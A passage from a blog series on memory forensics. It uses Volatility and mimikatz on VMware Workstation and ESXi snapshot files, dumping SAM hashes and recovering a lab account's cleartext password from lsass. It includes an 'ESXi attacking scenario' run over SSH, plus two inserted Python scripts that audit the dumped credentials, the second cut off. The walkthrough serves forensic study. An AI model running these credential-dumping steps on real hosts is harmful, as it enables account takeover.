Memdumps, Volatility, Mimikatz, VMs – Part 8: ESXi Attacking Scenario – Volatility on ESXi

How cool is that: Volatility standalone is running on ESXi...
This scenario only applies if you have SSH access to the ESXi server.
Connecting to downloads.volatilityfoundation.org (173.61.222.9:80)
volatility_2.5.linux 100% |*******************************| 32039k  0:00:00 ETA
[root@localhost:/tmp] unzip volatility_2.5.linux.standalone.zip
Archive:  volatility_2.5.linux.standalone.zip
   creating: volatility_2.5.linux.standalone/
  inflating: volatility_2.5.linux.standalone/AUTHORS.txt
  inflating: volatility_2.5.linux.standalone/CREDITS.txt
  inflating: volatility_2.5.linux.standalone/LEGAL.txt
  inflating: volatility_2.5.linux.standalone/LICENSE.txt
  inflating: volatility_2.5.linux.standalone/README.txt
  inflating: volatility_2.5.linux.standalone/volatility_2.5_linux_x64
  inflating: volatility_2.5.linux.standalone/volatility_2.5_linux_x86
Find the .vmem files:
[root@localhost:~] find -name *.vmem
./vmfs/volumes/56ac1339-5203be7f-4c07-000c29b25698/winxpsp3/winxpsp3-Snapshot3.vmem
./vmfs/volumes/56ac1339-5203be7f-4c07-000c29b25698/winxpsp3/winxpsp3-Snapshot2.vmem
./vmfs/volumes/56ac1339-5203be7f-4c07-000c29b25698/Windows 7 x64/Windows 7 x64-Snapshot1.vmem
Then the usual steps:
[root@localhost:/vmfs/volumes/56ac1339-5203be7f-4c07-000c29b25698/Windows 7 x64] /tmp/volatility_2.5.linux.standalone/volatility_2.5_linux_x64 -f "./Windows 7 x64-Snapshot1.vmem" imageinfo
Volatility Foundation Volatility Framework 2.5
INFO    : volatility.debug    : Determining profile based on KDBG search…
          Suggested Profile(s) : Win7SP0x64, Win7SP1x64, Win2008R2SP0x64, Win2008R2SP1x64
                     AS Layer1 : AMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (/vmfs/volumes/56ac1339-5203be7f-4c07-000c29b25698/Windows 7 x64/Windows 7 x64-Snapshot1.vmem)
                      PAE type : No PAE
                           DTB : 0x187000L
                          KDBG : 0xf800029fd0a0L
          Number of Processors : 1
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0xfffff800029fed00L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2016-01-30 08:36:01 UTC+0000
     Image local date and time : 2016-01-30 09:36:01 +0100
[root@localhost:/vmfs/volumes/56ac1339-5203be7f-4c07-000c29b25698/Windows 7 x64] /tmp/volatility_2.5.linux.standalone/volatility_2.5_linux_x64 -f "./Windows 7 x64-Snapshot1.vmem" --profile="Win7SP1x64" hivelist
Volatility Foundation Volatility Framework 2.5
Virtual            Physical           Name
------------------ ------------------ ----
0xfffff8a000f21010 0x000000000e407010 \SystemRoot\System32\Config\SAM
0xfffff8a000f241f0 0x000000001503b1f0 \SystemRoot\System32\Config\SECURITY
0xfffff8a000fcf010 0x0000000013dd3010 \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT
0xfffff8a0010211b0 0x0000000013c0c1b0 \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT
0xfffff8a00193f010 0x0000000007284010 \??\C:\Users\dax\ntuser.dat
0xfffff8a001994010 0x000000002a835010 \??\C:\Users\dax\AppData\Local\Microsoft\Windows\UsrClass.dat
0xfffff8a003226010 0x0000000015fe6010 \SystemRoot\System32\Config\DEFAULT
0xfffff8a00000f010 0x0000000027147010 [no name]
0xfffff8a000024010 0x00000000270d2010 \REGISTRY\MACHINE\SYSTEM
0xfffff8a000053010 0x0000000027001010 \REGISTRY\MACHINE\HARDWARE
0xfffff8a000c38010 0x0000000001afb010 \Device\HarddiskVolume1\Boot\BCD
0xfffff8a000d3f010 0x0000000022d0e010 \SystemRoot\System32\Config\SOFTWARE
[root@localhost:/vmfs/volumes/56ac1339-5203be7f-4c07-000c29b25698/Windows 7 x64] /tmp/volatility_2.5.linux.standalone/volatility_2.5_linux_x64 hashdump -f "./Windows 7 x64-Snapshot1.vmem" --profile="Win7SP1x64" -y 0xfffff8a000024010 -s 0xfffff8a000f21010
Volatility Foundation Volatility Framework 2.5
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Gast:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
dax:1000:aad3b435b51404eeaad3b435b51404ee:c5a237b7e9d8e708d8436b6148a25fa1:::
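The hashdump output above already shows something worth noticing: Administrator and Gast carry the NT hash of the empty string, and every LM field is the "no LM hash" value. The following Python script is an added example, not part of the original post: it audits pwdump-format lines for exactly these weak spots (empty password, LM hash stored, password of 7 characters or less, password shared between accounts). Its input is the output above plus one constructed line for the "test" account, built from the LM/NTLM pair mimikatz shows in part 6 (the RID 1001 is made up).

```python
"""Audit pwdump-format lines (user:rid:lm:nt:::) from Volatility's hashdump."""
import re
from collections import defaultdict

# Well-known constants: LM hash of the empty string (also what Windows stores
# when LM hashing is disabled) and NT hash of the empty string.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
EMPTY_LM_HALF = EMPTY_LM[16:]   # second LM half is empty when the password is <= 7 chars

LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

# Sample input: the three lines from the hashdump output above plus one
# constructed line for "test", using the LM/NTLM pair mimikatz shows in part 6
# (the RID 1001 is made up).
SAMPLE = """Volatility Foundation Volatility Framework 2.5
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Gast:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
dax:1000:aad3b435b51404eeaad3b435b51404ee:c5a237b7e9d8e708d8436b6148a25fa1:::
test:1001:624aac413795cdc1aad3b435b51404ee:c5a237b7e9d8e708d8436b6148a25fa1:::
"""


def parse_hashdump(text):
    """Return (user, rid, lm, nt) tuples; banner and malformed lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            user, rid, lm, nt = m.groups()
            entries.append((user, int(rid), lm.lower(), nt.lower()))
    return entries


def audit_entry(user, rid, lm, nt):
    """Findings for a single account."""
    findings = []
    if nt == EMPTY_NT:
        findings.append("empty password")
    if lm != EMPTY_LM:
        # A real LM hash means the password is <= 14 chars and quickly crackable.
        findings.append("LM hash stored")
        if lm[16:] == EMPTY_LM_HALF:
            findings.append("password is 7 characters or shorter")
    return findings


def shared_passwords(entries):
    """NT hash -> sorted users, for hashes used by more than one account.
    NT hashes are unsalted, so an equal hash means an equal password."""
    by_hash = defaultdict(list)
    for user, _rid, _lm, nt in entries:
        if nt != EMPTY_NT:          # empty passwords are reported per account
            by_hash[nt].append(user)
    return {h: sorted(users) for h, users in by_hash.items() if len(users) > 1}


def audit(text):
    """Return {user: [findings]} for every account with at least one finding."""
    entries = parse_hashdump(text)
    report = {}
    for user, rid, lm, nt in entries:
        findings = audit_entry(user, rid, lm, nt)
        if findings:
            report[user] = findings
    for users in shared_passwords(entries).values():
        for user in users:
            others = ", ".join(u for u in users if u != user)
            report.setdefault(user, []).append("same password as " + others)
    return report


if __name__ == "__main__":
    for user, findings in sorted(audit(SAMPLE).items()):
        print("%-14s %s" % (user, "; ".join(findings)))
```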
Create a snapshot
Yes, of course it is possible to create a snapshot from the CLI.
[root@localhost:~] vim-cmd vmsvc/snapshot.create 5 "snap" "some comment" 1 0
And again:
[root@localhost:~] find -name *.vmem
./vmfs/volumes/56ac1339-5203be7f-4c07-000c29b25698/Windows 7 x64/Windows 7 x64-Snapshot5.vmem
[root@localhost:/tmp/volatility_2.5.linux.standalone] ./volatility_2.5_linux_x64 -f "/vmfs/volumes/56ac1339-5203be7f-4c07-000c29b25698/Windows 7 x64/Windows 7 x64-Snapshot5.vmem" imageinfo
Volatility Foundation Volatility Framework 2.5
INFO    : volatility.debug    : Determining profile based on KDBG search…
          Suggested Profile(s) : Win2008R2SP0x64, Win7SP1x64, Win7SP0x64, Win2008R2SP1x64
                     AS Layer1 : AMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (/vmfs/volumes/56ac1339-5203be7f-4c07-000c29b25698/Windows 7 x64/Windows 7 x64-Snapshot5.vmem)
                      PAE type : No PAE
                           DTB : 0x187000L
                          KDBG : 0xf80002a4b0a0L
          Number of Processors : 1
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0xfffff80002a4cd00L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2016-01-31 14:55:50 UTC+0000
     Image local date and time : 2016-01-31 15:55:50 +0100
and so on.

Memdumps, Volatility, Mimikatz, VMs – Part 7: ESXi Server

– I installed ESXi 6 in VMWare Workstation 12
– for this download the ESXi image
– choose “typical installation” when creating a new VM in VMWare Workstation
– for learning and testing this is awesome
Screenshot of ESXi running in VMWare Workstation.
– I copied my Windows 7 VM from Workstation to ESXi.
– And made a snapshot like before (in part 6)
UPDATE: works also with .vmsn files
– Download the .vmem file from the datastore:
Or with the vSphere client:
Then go on like in all the parts before:
C:\Users\dax\Downloads\volatility_2.5.win.standalone>volatility-2.5.standalone.exe -f "Windows 7 x64-Snapshot1.vmem" imageinfo
Volatility Foundation Volatility Framework 2.5
INFO    : volatility.debug    : Determining profile based on KDBG search…
          Suggested Profile(s) : Win2008R2SP0x64, Win7SP1x64, Win7SP0x64, Win2008R2SP1x64
                     AS Layer1 : AMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (C:\Users\dax\Downloads\volatility_2.5.win.standalone\Windows 7 x64-Snapshot1.vmem)
                      PAE type : No PAE
                           DTB : 0x187000L
                          KDBG : 0xf800029fd0a0L
          Number of Processors : 1
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0xfffff800029fed00L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2016-01-30 08:36:01 UTC+0000
     Image local date and time : 2016-01-30 09:36:01 +0100
C:\Users\dax\Downloads\volatility_2.5.win.standalone>volatility-2.5.standalone.exe -f "Windows 7 x64-Snapshot1.vmem" --profile=Win7SP1x64 hivelist
Volatility Foundation Volatility Framework 2.5
Virtual            Physical           Name
------------------ ------------------ ----
0xfffff8a000f21010 0x000000000e407010 \SystemRoot\System32\Config\SAM
0xfffff8a000f241f0 0x000000001503b1f0 \SystemRoot\System32\Config\SECURITY
0xfffff8a000fcf010 0x0000000013dd3010 \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT
0xfffff8a0010211b0 0x0000000013c0c1b0 \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT
0xfffff8a00193f010 0x0000000007284010 \??\C:\Users\dax\ntuser.dat
0xfffff8a001994010 0x000000002a835010 \??\C:\Users\dax\AppData\Local\Microsoft\Windows\UsrClass.dat
0xfffff8a003226010 0x0000000015fe6010 \SystemRoot\System32\Config\DEFAULT
0xfffff8a00000f010 0x0000000027147010 [no name]
0xfffff8a000024010 0x00000000270d2010 \REGISTRY\MACHINE\SYSTEM
0xfffff8a000053010 0x0000000027001010 \REGISTRY\MACHINE\HARDWARE
0xfffff8a000c38010 0x0000000001afb010 \Device\HarddiskVolume1\Boot\BCD
0xfffff8a000d3f010 0x0000000022d0e010 \SystemRoot\System32\Config\SOFTWARE
C:\Users\dax\Downloads\volatility_2.5.win.standalone>volatility-2.5.standalone.exe hashdump -f "Windows 7 x64-Snapshot1.vmem" --profile=Win7SP1x64 -y 0xfffff8a000024010 -s 0xfffff8a000f21010
Volatility Foundation Volatility Framework 2.5
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Gast:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
dax:1000:aad3b435b51404eeaad3b435b51404ee:c5a237b7e9d8e708d8436b6148a25fa1:::

Memdumps, Volatility, Mimikatz, VMs – Part 6: VMWare Workstation

The VM is running Windows 7.
From the running machine take the snapshot:
Now it is possible to perform the volatility stuff directly with the .vmem file from the snapshot:
C:\Users\dax\Downloads\volatility_2.5.win.standalone>volatility-2.5.standalone.exe -f "C:\Users\dax\Documents\Virtual Machines\Windows 7 x64\Windows 7 x64-Snapshot1.vmem" imageinfo
Volatility Foundation Volatility Framework 2.5
INFO    : volatility.debug    : Determining profile based on KDBG search…
          Suggested Profile(s) : Win2008R2SP0x64, Win7SP1x64, Win7SP0x64, Win2008R2SP1x64
                     AS Layer1 : AMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (C:\Users\dax\Documents\Virtual Machines\Windows 7 x64\Windows 7 x64-Snapshot1.vmem)
                      PAE type : No PAE
                           DTB : 0x187000L
                          KDBG : 0xf800029f50a0L
          Number of Processors : 1
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0xfffff800029f6d00L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2016-01-29 17:48:24 UTC+0000
     Image local date and time : 2016-01-29 18:48:24 +0100
C:\Users\dax\Downloads\volatility_2.5.win.standalone>volatility-2.5.standalone.exe -f "C:\Users\dax\Documents\Virtual Machines\Windows 7 x64\Windows 7 x64-Snapshot1.vmem" --profile=Win7SP1x64 hivelist
Volatility Foundation Volatility Framework 2.5
Virtual            Physical           Name
------------------ ------------------ ----
0xfffff8a001ea6010 0x000000006a5f9010 \??\C:\Users\test\AppData\Local\Microsoft\Windows\UsrClass.dat
0xfffff8a00000d250 0x000000002d4e6250 [no name]
0xfffff8a000024010 0x000000002d491010 \REGISTRY\MACHINE\SYSTEM
0xfffff8a000052010 0x000000002d53f010 \REGISTRY\MACHINE\HARDWARE
0xfffff8a0000f6410 0x0000000024cbf410 \SystemRoot\System32\Config\DEFAULT
0xfffff8a000fec010 0x0000000026cbf010 \Device\HarddiskVolume1\Boot\BCD
0xfffff8a001003010 0x0000000023191010 \SystemRoot\System32\Config\SOFTWARE
0xfffff8a001263010 0x000000001d2a5010 \SystemRoot\System32\Config\SECURITY
0xfffff8a0012f6010 0x000000001d138010 \SystemRoot\System32\Config\SAM
0xfffff8a0013ea010 0x0000000015820010 \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT
0xfffff8a001439010 0x0000000015446010 \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT
0xfffff8a001e0d010 0x00000000355c7010 \??\C:\Users\test\ntuser.dat
C:\Users\dax\Downloads\volatility_2.5.win.standalone>volatility-2.5.standalone.exe hashdump -f "C:\Users\dax\Documents\Virtual Machines\Windows 7 x64\Windows 7 x64-Snapshot1.vmem" --profile=Win7SP1x64 -y 0xfffff8a000024010 -s 0xfffff8a0012f6010
Volatility Foundation Volatility Framework 2.5
Administrator:500:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
Gast:501:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
test:1000:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
WinDBG
The WinDBG method works too, but first the image needs to be converted. Download vmss2core (https://labs.vmware.com/flings/vmss2core).
Then convert the image:
C:\Users\dax\Downloads\volatility_2.5.win.standalone>..\vmss2core-win.exe -W "C:\Users\dax\Documents\Virtual Machines\Windows 7 x64\Windows 7 x64-Snapshot1.vmsn" "C:\Users\dax\Documents\Virtual Machines\Windows 7 x64\Windows 7 x64-Snapshot1.vmem"
vmss2core version 2452889 Copyright (C) 1998-2015 VMware, Inc. All rights reserved.
… 10 MBs written.
… 20 MBs written.
… 30 MBs written.
… 40 MBs written.
… 50 MBs written.
… 60 MBs written.
… 70 MBs written.
… 80 MBs written.
… 90 MBs written.
… 100 MBs written.
Then just go on like in part 3:
Microsoft (R) Windows Debugger Version 6.3.9600.17336 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.
Loading Dump File [C:\Users\dax\Downloads\volatility_2.5.win.standalone\memory.dmp]
Kernel Complete Dump File: Full address space is available
Symbol search path is: *** Invalid ***
****************************************************************************
* Symbol loading may be unreliable without a symbol search path.           *
* Use .symfix to have the debugger choose a symbol path.                   *
* After setting your symbol path, use .reload to refresh symbol locations. *
****************************************************************************
Executable search path is:
*********************************************************************
* Symbols can not be loaded because symbol path is not initialized. *
*                                                                   *
* The Symbol Path can be set by:                                    *
*   using the _NT_SYMBOL_PATH environment variable.                 *
*   using the -y <symbol_path> argument when starting the debugger. *
*   using .sympath and .sympath+                                    *
*********************************************************************
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntkrnlmp.exe –
Windows 7 Kernel Version 7601 (Service Pack 1) UP Free x64
Product: WinNt, suite: TerminalServer SingleUserTS Personal
Built by: 7601.17514.amd64fre.win7sp1_rtm.101119-1850
Machine Name:
Kernel base = 0xfffff800`02804000 PsLoadedModuleList = 0xfffff800`02a49e90
Debug session time: Fri Jan 29 18:48:24.926 2016 (UTC + 1:00)
System Uptime: 0 days 0:05:16.423
*********************************************************************
* Symbols can not be loaded because symbol path is not initialized. *
*                                                                   *
* The Symbol Path can be set by:                                    *
*   using the _NT_SYMBOL_PATH environment variable.                 *
*   using the -y <symbol_path> argument when starting the debugger. *
*   using .sympath and .sympath+                                    *
*********************************************************************
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntkrnlmp.exe –
Loading Kernel Symbols
………………………………………………………
……………………………………………………….
………………….
Loading User Symbols
……………………………………………………….
……………………..
Loading unloaded module list
….*** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntdll.dll –
************* Symbol Loading Error Summary **************
Module name            Error
ntkrnlmp               The system cannot find the file specified
ntdll                  The system cannot find the file specified
You can troubleshoot most symbol related issues by turning on symbol loading diagnostics (!sym noisy) and repeating the command that caused symbols to be loaded.
You should also verify that your symbol search path (.sympath) is correct.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for vmtools.dll –
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************
Use !analyze -v to get detailed debugging information.
BugCheck 80, {4f4454, 0, 0, 0}
*** ERROR: Module load completed but symbols could not be loaded for mssmbios.sys
***** Kernel symbols are WRONG. Please fix symbols to do analysis.
*************************************************************************
***                                                                   ***
***                                                                   ***
***    Either you specified an unqualified symbol, or your debugger   ***
***    doesn’t have full symbol information.  Unqualified symbol      ***
***    resolution is turned off by default. Please either specify a   ***
***    fully qualified symbol module!symbolname, or enable resolution ***
***    of unqualified symbols by typing “.symopt- 100”. Note that   ***
***    enabling unqualified symbol resolution with network symbol     ***
***    server shares in the symbol path may cause the debugger to     ***
***    appear to hang for long periods of time when an incorrect      ***
***    symbol name is typed or the network symbol server is down.     ***
***                                                                   ***
***    For some commands to work properly, your symbol path           ***
***    must point to .pdb files that have full type information.      ***
***                                                                   ***
***    Certain .pdb files (such as the public OS symbols) do not      ***
***    contain the required information.  Contact the group that      ***
***    provided you with these symbols if you need this command to    ***
***    work.                                                          ***
***                                                                   ***
***    Type referenced: nt!_KPRCB                                     ***
***                                                                   ***
*************************************************************************
*************************************************************************
***                                                                   ***
***                                                                   ***
***    Either you specified an unqualified symbol, or your debugger   ***
***    doesn’t have full symbol information.  Unqualified symbol      ***
***    resolution is turned off by default. Please either specify a   ***
***    fully qualified symbol module!symbolname, or enable resolution ***
***    of unqualified symbols by typing “.symopt- 100”. Note that   ***
***    enabling unqualified symbol resolution with network symbol     ***
***    server shares in the symbol path may cause the debugger to     ***
***    appear to hang for long periods of time when an incorrect      ***
***    symbol name is typed or the network symbol server is down.     ***
***                                                                   ***
***    For some commands to work properly, your symbol path           ***
***    must point to .pdb files that have full type information.      ***
***                                                                   ***
***    Certain .pdb files (such as the public OS symbols) do not      ***
***    contain the required information.  Contact the group that      ***
***    provided you with these symbols if you need this command to    ***
***    work.                                                          ***
***                                                                   ***
***    Type referenced: nt!_KPRCB                                     ***
***                                                                   ***
*************************************************************************
*************************************************************************
***                                                                   ***
***                                                                   ***
***    Either you specified an unqualified symbol, or your debugger   ***
***    doesn’t have full symbol information.  Unqualified symbol      ***
***    resolution is turned off by default. Please either specify a   ***
***    fully qualified symbol module!symbolname, or enable resolution ***
***    of unqualified symbols by typing “.symopt- 100”. Note that   ***
***    enabling unqualified symbol resolution with network symbol     ***
***    server shares in the symbol path may cause the debugger to     ***
***    appear to hang for long periods of time when an incorrect      ***
***    symbol name is typed or the network symbol server is down.     ***
***                                                                   ***
***    For some commands to work properly, your symbol path           ***
***    must point to .pdb files that have full type information.      ***
***                                                                   ***
***    Certain .pdb files (such as the public OS symbols) do not      ***
***    contain the required information.  Contact the group that      ***
***    provided you with these symbols if you need this command to    ***
***    work.                                                          ***
***                                                                   ***
***    Type referenced: nt!_KPRCB                                     ***
***                                                                   ***
*************************************************************************
*********************************************************************
* Symbols can not be loaded because symbol path is not initialized. *
*                                                                   *
* The Symbol Path can be set by:                                    *
*   using the _NT_SYMBOL_PATH environment variable.                 *
*   using the -y <symbol_path> argument when starting the debugger. *
*   using .sympath and .sympath+                                    *
*********************************************************************
Probably caused by : ntkrnlmp.exe
Followup: MachineOwner
---------
kd> .load c:\users\dax\downloads\mimikatz\x64\mimilib.dll
  .#####.   mimikatz 2.0 alpha (x64) built on Jan 17 2016 00:38:45
 .## ^ ##.  “A La Vie, A L’Amour” – Windows build 7601
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ‘## v ##’   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  ‘#####’                                  WinDBG extension ! * * */
===================================
#         * Kernel mode *         #
===================================
# Search for LSASS process
0: kd> !process 0 0 lsass.exe
# Then switch to its context
0: kd> .process /r /p <EPROCESS address>
# And finally :
0: kd> !mimikatz
===================================
#          * User mode *          #
===================================
0:000> !mimikatz
===================================
kd> !process 0 0 lsass.exe
NT symbols are incorrect, please fix symbols
kd> .SymFix
kd> .Reload
Loading Kernel Symbols
………………………………………………………
……………………………………………………….
………………….
Loading User Symbols
……………………………………………………….
……………………..
Loading unloaded module list
….Unable to enumerate user-mode unloaded modules, NTSTATUS 0xC0000147
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for vmtools.dll –
************* Symbol Loading Error Summary **************
Module name            Error
vmtools                PDB not found : cache*
                       No data is available : SRV*http://msdl.microsoft.com/download/symbols
You can troubleshoot most symbol related issues by turning on symbol loading diagnostics (!sym noisy) and repeating the command that caused symbols to be loaded.
You should also verify that your symbol search path (.sympath) is correct.
kd> !process 0 0 lsass.exe
PROCESS fffffa8003a7bb30
    SessionId: 0  Cid: 020c    Peb: 7fffffdb000  ParentCid: 01a4
    DirBase: 1e66e000  ObjectTable: fffff8a00123c6e0  HandleCount: 538.
    Image: lsass.exe
kd> .process /r /p fffffa8003a7bb30
Implicit process is now fffffa80`03a7bb30
Loading User Symbols
……………………………………………………
kd> !mimikatz
DPAPI Backup keys
=================
Current prefered key:       {00000000-0000-0000-0000-000000000000}
Compatibility prefered key: {00000000-0000-0000-0000-000000000000}
SekurLSA
========
Authentication Id : 0 ; 430604 (00000000:0006920c)
Session           : Interactive from 1
User Name         : test
Domain            : WIN-254BC5SVOCB
Logon Server      : WIN-254BC5SVOCB
Logon Time        : 29.01.2016 18:46:10
SID               : S-1-5-21-1016508660-14321150-529431041-1000
    msv :
     [00000003] Primary
     * Username : test
     * Domain   : WIN-254BC5SVOCB
     * LM       : 624aac413795cdc1aad3b435b51404ee
     * NTLM     : c5a237b7e9d8e708d8436b6148a25fa1
     * SHA1     : 39cfdb69532cff3336f08a83aac42524f41cd6e9
    tspkg :
     * Username : test
     * Domain   : WIN-254BC5SVOCB
     * Password : test123
    wdigest :
     * Username : test
     * Domain   : WIN-254BC5SVOCB
     * Password : test123
    kerberos :
     * Username : test
     * Domain   : WIN-254BC5SVOCB
     * Password : test123
     * Key List
       aes256_hmac       <no size, buffer is incorrect>
       aes128_hmac       <no size, buffer is incorrect>
       rc4_hmac_nt       c5a237b7e9d8e708d8436b6148a25fa1
       rc4_hmac_old      c5a237b7e9d8e708d8436b6148a25fa1
       rc4_md4           c5a237b7e9d8e708d8436b6148a25fa1
       rc4_hmac_nt_exp   c5a237b7e9d8e708d8436b6148a25fa1
       rc4_hmac_old_exp  c5a237b7e9d8e708d8436b6148a25fa1
    ssp :
    masterkey :
    credman :
Authentication Id : 0 ; 430574 (00000000:000691ee)
Session           : Interactive from 1
User Name         : test
Domain            : WIN-254BC5SVOCB
Logon Server      : WIN-254BC5SVOCB
Logon Time        : 29.01.2016 18:46:10
SID               : S-1-5-21-1016508660-14321150-529431041-1000
    msv :
     [00000003] Primary
     * Username : test
     * Domain   : WIN-254BC5SVOCB
     * LM       : 624aac413795cdc1aad3b435b51404ee
     * NTLM     : c5a237b7e9d8e708d8436b6148a25fa1
     * SHA1     : 39cfdb69532cff3336f08a83aac42524f41cd6e9
    tspkg :
     * Username : test
     * Domain   : WIN-254BC5SVOCB
     * Password : test123
    wdigest :
     * Username : test
     * Domain   : WIN-254BC5SVOCB
     * Password : test123
    kerberos :
     * Username : test
     * Domain   : WIN-254BC5SVOCB
     * Password : test123
     * Key List
       aes256_hmac       <no size, buffer is incorrect>
       aes128_hmac       <no size, buffer is incorrect>
       rc4_hmac_nt       c5a237b7e9d8e708d8436b6148a25fa1
       rc4_hmac_old      c5a237b7e9d8e708d8436b6148a25fa1
       rc4_md4           c5a237b7e9d8e708d8436b6148a25fa1
       rc4_hmac_nt_exp   c5a237b7e9d8e708d8436b6148a25fa1
       rc4_hmac_old_exp  c5a237b7e9d8e708d8436b6148a25fa1
    ssp :
    masterkey :
    credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOKALER DIENST
Domain            : NT-AUTORITÄT
Logon Server      :
Logon Time        : 29.01.2016 18:43:31
SID               : S-1-5-19
    msv :
    tspkg : KO
    wdigest :
     * Username : (null)
     * Domain   : (null)
     * Password : (null)
    kerberos :
     * Username : (null)
     * Domain   : (null)
     * Password : (null)
    ssp :
    masterkey :
    credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN-254BC5SVOCB$
Domain            : WORKGROUP
Logon Server      :
Logon Time        : 29.01.2016 18:43:31
SID               : S-1-5-20
    msv :
    tspkg : KO
    wdigest :
     * Username : WIN-254BC5SVOCB$
     * Domain   : WORKGROUP
     * Password : (null)
    kerberos :
     * Username : win-254bc5svocb$
     * Domain   : WORKGROUP
     * Password : (null)
    ssp :
    masterkey :
    credman :
Authentication Id : 0 ; 48578 (00000000:0000bdc2)
Session           : UndefinedLogonType from 0
User Name         :
Domain            :
Logon Server      :
Logon Time        : 29.01.2016 18:43:29
SID               :
    msv :
    tspkg : KO
    wdigest : KO
    kerberos : KO
    ssp :
    masterkey :
    credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WIN-254BC5SVOCB$
Domain            : WORKGROUP
Logon Server      :
Logon Time        : 29.01.2016 18:43:29
SID               : S-1-5-18
    msv :
    tspkg : KO
    wdigest :
     * Username : WIN-254BC5SVOCB$
     * Domain   : WORKGROUP
     * Password : (null)
    kerberos :
     * Username : win-254bc5svocb$
     * Domain   : WORKGROUP
     * Password : (null)
    ssp :
    masterkey :
     [00000000]
     * GUID      :    {f22e410f-f947-4e08-8f2a-8f65df603f8d}
     * Time      :    29.01.2016 17:43:30
     * MasterKey :    19c05880b67d50f8231cd8009836e3cdc55610e4877f8b976abd5ca15600d0e759934324c6204b56f02527039e7fc52a1dfb5296d3381aaa7c3eb610dffa32fa
    credman :
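For incident-response scoping, the interesting question in the !mimikatz output above is which accounts had a cleartext password held by which provider (tspkg, wdigest, kerberos), as opposed to only a hash in msv. The following Python parser is an added example, not part of the original post; its input is a shortened copy of the sekurlsa output above (one interactive session for "test", one service session with null credentials).

```python
"""Parse mimikatz sekurlsa output and report cleartext password exposure per account."""
import re

# Sample input: shortened copy of the !mimikatz output above.
SEKURLSA = """Authentication Id : 0 ; 430604 (00000000:0006920c)
Session           : Interactive from 1
User Name         : test
Domain            : WIN-254BC5SVOCB
Logon Server      : WIN-254BC5SVOCB
Logon Time        : 29.01.2016 18:46:10
SID               : S-1-5-21-1016508660-14321150-529431041-1000
    msv :
     [00000003] Primary
     * Username : test
     * Domain   : WIN-254BC5SVOCB
     * NTLM     : c5a237b7e9d8e708d8436b6148a25fa1
    tspkg :
     * Username : test
     * Domain   : WIN-254BC5SVOCB
     * Password : test123
    wdigest :
     * Username : test
     * Domain   : WIN-254BC5SVOCB
     * Password : test123
    kerberos :
     * Username : test
     * Domain   : WIN-254BC5SVOCB
     * Password : test123
    ssp :
    masterkey :
    credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOKALER DIENST
Domain            : NT-AUTORITÄT
Logon Server      :
    msv :
    tspkg : KO
    wdigest :
     * Username : (null)
     * Domain   : (null)
     * Password : (null)
    ssp :
    masterkey :
    credman :
"""

SESSION_START = "Authentication Id :"
PROVIDER_RE = re.compile(r"^ {4}(\w+) :")            # e.g. "    wdigest :"
FIELD_RE = re.compile(r"^ {5}\* (\w+)\s+: (.*)$")      # e.g. "     * Password : test123"
HEADER_RE = re.compile(r"^(\w[\w ]*?)\s*:\s?(.*)$")    # e.g. "User Name         : test"


def parse_sekurlsa(text):
    """Return one dict per logon session: header fields by name, plus a
    "providers" dict mapping provider name -> {field: value}."""
    sessions, current, provider = [], None, None
    for line in text.splitlines():
        if line.startswith(SESSION_START):
            current, provider = {"providers": {}}, None
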